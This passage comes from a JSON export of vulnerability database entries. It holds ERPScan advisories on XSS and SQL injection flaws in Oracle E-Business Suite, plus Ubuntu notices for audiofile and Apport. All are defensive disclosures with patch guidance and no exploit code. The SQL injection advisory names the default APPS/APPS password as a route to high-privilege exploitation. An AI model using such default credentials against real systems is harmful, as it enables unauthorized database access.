ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality None &#40;N&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting &#40;XSS&#41; due\r\nto lack of sanitizing the &quot;domain&quot; parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4854"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "4b5a683c958427d1f139ea46960c1f77"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "ac4e2716cd1f40662335b0c2baefa8ac"}, {"key": "href", "hash": "793234d92076d083ca1ba3d060535b33"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "5015d42a9a849429bfd5eccdc891f977"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d412a2c5f1d57e01c882336bd5b7b03d9bbc5e601468b64828936dded249a019", "viewCount": 182, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4854"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-027"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015", "ORACLE:CPUOCT2015-2367953"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32657", "bulletinFamily": "software", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; High &#40;H&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; Single &#40;S&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions &#40;afamexts.sql&#41; does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password &#40;for example,\r\ndefault password APPS/APPS&#41;, he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4846"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2028f4e78a559d181736340a0b1d147d"}, {"key": "cvss", "hash": "2cbf8392c8ba6ad3fc64242f5a2d3294"}, {"key": "description", "hash": "0003d17d2e87c7e0ff565bcbf5cb29db"}, {"key": "href", "hash": "3b52d758a08f078f46108d7d53e82563"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "79450712fbf162b7be89a44b998f0b41"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b741a8a189c11460c107071162d0ca6a5c37837c88eb3e8aa27aacd53d2530d3", "viewCount": 165, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4846"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-026"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:VULN:14720", "bulletinFamily": "software", "title": "apport security vulnerabilities", "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "cvelist": ["CVE-2015-1338"], "type": "securityvulns", "lastseen": "2021-06-08T18:47:21", "history": [{"bulletin": {"affectedSoftware": [{"name": "Apport", "operator": "eq", "version": "2.18"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:02", "references": [{"idList": ["1337DAY-ID-24318"], "type": "zdt"}, {"idList": ["EDB-ID:38353"], "type": "exploitdb"}, {"idList": ["SUSE_SU-2017-1938-1.NASL", "UBUNTU_USN-2744-1.NASL"], "type": "nessus"}, {"idList": ["USN-2744-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310842461"], "type": "openvas"}, {"idList": ["CVE-2015-1338"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:32549", "SECURITYVULNS:DOC:32660"], "type": "securityvulns"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:02", "rev": 2, "value": 6.3, "vector": "NONE"}}, "hash": "1fa5005708a149c7c59442ee368563a06ac60940d1520936b1bdf2bc66d28119", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "f2f10dc547bbfec7457259bd6d7e047e", "key": "affectedSoftware"}, {"hash": "c40e388f6268f3ea89c15217ff7a389f", "key": "href"}, {"hash": "5ed00cd4fde4dff0aae89dbca81d74db", "key": "references"}, {"hash": "bc78879f0f9131664d05d93df6e74e24", "key": "description"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "6ba287598210482dd32c01dba6343482", "key": "title"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "c673ee2fdc72d8a4f67ca23a54ca10e5", "key": "cvelist"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "id": "SECURITYVULNS:VULN:14720", "immutableFields": [], "lastseen": "2018-08-31T11:10:02", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "reporter": "BUGTRAQ", "title": "apport security vulnerabilities", "type": "securityvulns", "viewCount": 486}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:02"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "c063ed29dc851cbe70ebf2ae9876b01e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "c673ee2fdc72d8a4f67ca23a54ca10e5"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "bc78879f0f9131664d05d93df6e74e24"}, {"key": "href", "hash": "c40e388f6268f3ea89c15217ff7a389f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "5ed00cd4fde4dff0aae89dbca81d74db"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "6ba287598210482dd32c01dba6343482"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "6a476b22964ed9af13d180099f91a74f2789ce11576be85b9f99a47748d85438", "viewCount": 496, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2015-1338"]}, {"type": "cve", "idList": ["CVE-2015-1338"]}, {"type": "exploitdb", "idList": ["EDB-ID:38353"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842461"]}, {"type": "zdt", "idList": ["1337DAY-ID-24318"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32549"]}, {"type": "ubuntu", "idList": ["USN-2744-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2744-1.NASL", "SUSE_SU-2017-1938-1.NASL"]}], "modified": "2021-06-08T18:47:21", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-06-08T18:47:21", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "apport", "operator": "eq", "version": "2.18"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32652", "bulletinFamily": "software", "title": "[USN-2787-1] audiofile vulnerability", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7747"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "50c023fd612f4a3919caafafd70af1c7"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "e1b942ed5a7d4bd7fdbdd4d984bbcfa8"}, {"key": "href", "hash": "87f14b8fbd08732c6a73b13d46fe98ee"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "e9b921c5bed1ed652b982edc288318b4"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "2d5a85403cc62aca18c0b34cea5aabc8d0bf0116ed796c96ad83efa605c5584f", "viewCount": 339, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2015-7747"]}, {"type": "cve", "idList": ["CVE-2015-7747"]}, {"type": "fedora", "idList": ["FEDORA:476D76074A70", "FEDORA:AC00060E6E18"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842506", "OPENVAS:1361412562310131103", "OPENVAS:1361412562310806796"]}, {"type": "ubuntu", "idList": ["USN-2787-1"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-0940-1.NASL", "OPENSUSE-2015-698.NASL", "UBUNTU_USN-2787-1.NASL", "FEDORA_2015-605CD28F33.NASL", "FEDORA_2015-4BC7688B3E.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14754"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-3877"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32660", "bulletinFamily": "software", "title": "[USN-2782-1] Apport vulnerability", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-1341"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "8f49c49cf517447776f8becbe7916610"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "67dffb644bd6572ab0e644ffec4f8a3d"}, {"key": "href", "hash": "d0b126369a0f5b3d6c7e71db9fa232a5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "874f3cf5f97e14a7710794ca3a33d6b6"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "7aa6be6084a2337a91bd0bd8527d0eafc3a8d4e537ffb27c8af1a86889efc06d", "viewCount": 209, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2015-1341"]}, {"type": "cve", "idList": ["CVE-2015-1341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842505"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2782-1.NASL"]}, {"type": "ubuntu", "idList": ["USN-2782-1"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}]}